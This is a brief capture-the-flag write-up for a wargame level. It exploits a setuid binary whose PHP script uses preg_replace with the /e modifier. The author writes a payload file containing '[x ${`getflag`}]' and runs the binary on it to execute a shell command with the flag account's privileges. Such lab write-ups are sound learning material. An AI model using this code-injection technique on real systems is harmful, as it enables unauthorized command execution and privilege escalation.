~$ ll
-> [...]
   -rwsr-x---+ 1 flag06  level06 7503 Aug 30  2015 level06*
   -rwxr-x---  1 flag06  level06  356 Mar  5  2016 level06.php*
   [...]

~$ ./level06
-> PHP Warning:  file_get_contents(): Filename cannot be empty in /home/user/level06/level06.php on line 4

~$ cat level06.php
-> #!/usr/bin/php
   <?php
   function y($m) { $m = preg_replace("/\./", " x ", $m); $m = preg_replace("/@/", " y", $m); return $m; }
   function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); $a = preg_replace("/\[/", "(", $a); $a = preg_replace("/\]/", ")", $a); return $a; }
   $r = x($argv[1], $argv[2]); print $r;
   ?>

1. file_get_contents -> reads file
2. preg_replace -> compiling regular expressions
3. /e evaluate argument as PHP expression, it is vunerable and we can execute shell command with it

Accroding to pattern argunment shoul be [x {`getflag`}]

~$ echo '[x ${`getflag`}]' > /tmp/flag06
~$ ./level06 /tmp/flag06

Password: getflag in script

Voila!